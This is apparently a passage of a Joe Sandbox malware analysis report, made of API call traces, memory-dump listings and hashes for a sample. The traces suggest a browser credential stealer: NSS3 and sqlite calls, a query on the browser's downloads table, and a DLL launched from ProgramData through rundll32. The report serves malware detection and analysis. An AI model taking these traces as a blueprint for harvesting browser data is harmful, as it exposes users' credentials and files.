                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2459274275-0
                                                                                                                                                                                                              • Opcode ID: a165c957ec7efebcd49d2fcab981f95f4bda1a8585cc17e22a2a4fa765061b53
                                                                                                                                                                                                              • Instruction ID: 3818221ac9a534620beffb4123f2018d3b2a5d29dd37710194cb55ee3888063d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a165c957ec7efebcd49d2fcab981f95f4bda1a8585cc17e22a2a4fa765061b53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC4171B1E0020AABDF018FA9DC45BEE7BB9AF48358F044029F914A7750E771C956CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strtok_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3330995566-0
                                                                                                                                                                                                              • Opcode ID: fd7173024faee94e8cabf1d916b2c66e4c46f5c8cc9a8419b3d18f1e2cb4404f
                                                                                                                                                                                                              • Instruction ID: 9a87a7e6838a06d77e6be33a0d11cae55feaae03f39c032e09163454da833a40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd7173024faee94e8cabf1d916b2c66e4c46f5c8cc9a8419b3d18f1e2cb4404f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15319C71E91205AFCB14CF64CC85B69BBACAF5870AFA1C459E806DB092DB38CB449F40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CB15D71), ref: 6CB15F0A
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB15F1F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(89000904), ref: 6CB15F2F
                                                                                                                                                                                                              • PR_Unlock.NSS3(890008E8), ref: 6CB15F55
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB15F6D
                                                                                                                                                                                                              • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CB15F7D
                                                                                                                                                                                                                • Part of subcall function 6CB15220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CB15F82,8B4274C0), ref: 6CB15248
                                                                                                                                                                                                                • Part of subcall function 6CB15220: EnterCriticalSection.KERNEL32(0F6CBE0D,?,6CB15F82,8B4274C0), ref: 6CB1525C
                                                                                                                                                                                                                • Part of subcall function 6CB15220: PR_SetError.NSS3(00000000,00000000), ref: 6CB1528E
                                                                                                                                                                                                                • Part of subcall function 6CB15220: PR_Unlock.NSS3(0F6CBDF1), ref: 6CB15299
                                                                                                                                                                                                                • Part of subcall function 6CB15220: free.MOZGLUE(00000000), ref: 6CB152A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3150690610-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB53D3F
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_NewArena_Util.NSS3(00000800,6CB53CAF,?), ref: 6CACBABF
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CB53CAF,?), ref: 6CACBAD5
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CB53CAF,?), ref: 6CACBB08
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB53CAF,?), ref: 6CACBB1A
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CB53CAF,?), ref: 6CACBB3B
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB53CCB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890AB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890C9
                                                                                                                                                                                                                • Part of subcall function 6CB89090: EnterCriticalSection.KERNEL32 ref: 6CB890E5
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB89116
                                                                                                                                                                                                                • Part of subcall function 6CB89090: LeaveCriticalSection.KERNEL32 ref: 6CB8913F
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB53CE2
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB53CF8
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB53D15
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB53D2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4030862364-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB1FE08
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB1FE1D
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB1FE29
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB1FE3D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB1FE62
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6CB1FE6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 660648399-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Lock.NSS3 ref: 6CBCFD9E
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CAB1A48), ref: 6CB89BB3
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAB1A48), ref: 6CB89BC8
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6CBCFDB9
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: TlsGetValue.KERNEL32(00000000,?,6CC214E4,?,6CA44DD9), ref: 6CAAA90F
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CAAA94F
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBCFDD4
                                                                                                                                                                                                              • PR_Lock.NSS3 ref: 6CBCFDF2
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3 ref: 6CBCFE0D
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBCFE23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3365241057-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00000000,?,?,?,009337D4,00000000,00000010), ref: 009320EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(C:\Users\user\Documents\,?,00000000,?), ref: 00932107
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00932119
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093212B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\Documents\
                                                                                                                                                                                                              • API String ID: 1206339513-974084235
                                                                                                                                                                                                              • Opcode ID: 862338497aeefee82ae41348853de130bf3c58978b5555e54667d810899186af
                                                                                                                                                                                                              • Instruction ID: 766a58640f47b9d49e90578c52ca3e25715061bb14f863b54651b92243dc827b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 862338497aeefee82ae41348853de130bf3c58978b5555e54667d810899186af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61F0E9322002197BE7010F59DC48C66BFACDF9D669F0100A0F91C97221CA71CD518BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 00932BC4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                              • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              • API String ID: 2215929589-2108736111
                                                                                                                                                                                                              • Opcode ID: 0819a539cc89ab035cf5ae9789101207baafafdde2c8be13fa1358bd96a54826
                                                                                                                                                                                                              • Instruction ID: b18f5ce657f2920b9240701b92a65f50d9f12f0dbd86f6dfeb695dadbfee6875
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0819a539cc89ab035cf5ae9789101207baafafdde2c8be13fa1358bd96a54826
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE71B036D10129ABCF11FBA5ED42BCDB7B4AF84700F514161BA50B7166DB70AE8A8F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CB0FC55
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB0FCB2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB0FDB7
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CB0FDDE
                                                                                                                                                                                                                • Part of subcall function 6CB18800: TlsGetValue.KERNEL32(?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18821
                                                                                                                                                                                                                • Part of subcall function 6CB18800: TlsGetValue.KERNEL32(?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB1883D
                                                                                                                                                                                                                • Part of subcall function 6CB18800: EnterCriticalSection.KERNEL32(?,?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18856
                                                                                                                                                                                                                • Part of subcall function 6CB18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CB18887
                                                                                                                                                                                                                • Part of subcall function 6CB18800: PR_Unlock.NSS3(?,?,?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18899
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                              • String ID: pkcs11:
                                                                                                                                                                                                              • API String ID: 362709927-2446828420
                                                                                                                                                                                                              • Opcode ID: 550702c3ac5b0b2f82d240fb621c8402f99526155a3a96f6b002fa4d350d9091
                                                                                                                                                                                                              • Instruction ID: 93a562cef60f6bbc1a6095f2927e34ca731a9b8f9077d0640ce4bf4d3a6753dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 550702c3ac5b0b2f82d240fb621c8402f99526155a3a96f6b002fa4d350d9091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF51EEB1B042E19BEF108F689C41B9E3B75FB40359F190225DD04ABF51EB31E809CB9A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092830C
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 00928341
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLocal_memset
                                                                                                                                                                                                              • String ID: ERROR_V128$v10$v20
                                                                                                                                                                                                              • API String ID: 52611349-1964637325
                                                                                                                                                                                                              • Opcode ID: 1a3abff22741195293c8972ee2df9f6f6eab389811952e8e4bb40a5188cd6cd4
                                                                                                                                                                                                              • Instruction ID: d0718d72a7f1ac5a65e74c853e5c06a420b4c8ada6a692162f18060fefe62023
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a3abff22741195293c8972ee2df9f6f6eab389811952e8e4bb40a5188cd6cd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341B472A01128ABCB10DFB5EC45AEF7BA8AF84714F154525FD04E7284EB70DE458B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CA4BE02
                                                                                                                                                                                                                • Part of subcall function 6CB79C40: memcmp.VCRUNTIME140(?,00000000,6CA4C52B), ref: 6CB79D53
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4BE9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA4BE93
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA4BE89
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA4BE98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 1135338897-598938438
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F29C
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F2BB
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0092F2F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 3404309857-4289949731
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CAB0BDE), ref: 6CAB0DCB
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6CAB0BDE), ref: 6CAB0DEA
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CAB0BDE), ref: 6CAB0DFC
                                                                                                                                                                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CAB0BDE), ref: 6CAB0E32
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s incr => %d (find lib), xrefs: 6CAB0E2D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                              • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                              • API String ID: 97259331-2309350800
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CA59CF2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6CA59D45
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CA59D8B
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6CA59DDE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092947C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929497
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                              • API String ID: 2500673778-2241552939
                                                                                                                                                                                                              • Opcode ID: 0eacaf2b13c2baca473daf1f1ac590590b201994870cb7ca256f495c553d882b
                                                                                                                                                                                                              • Instruction ID: 6f1043a26f65e46d10c36291155a8c7c8b2f133241ca3fcae57c4c2e6d7676d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eacaf2b13c2baca473daf1f1ac590590b201994870cb7ca256f495c553d882b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD71E536900129ABCF05FFA5EE43ADDB774AF84305F514121F950B706ADB60BE8A8F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DE1B
                                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CB6DE77
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2700453212-0
                                                                                                                                                                                                              • Opcode ID: 1bd40981f08325fa997d2231ca832bee5e36db316787db991e808c7610808951
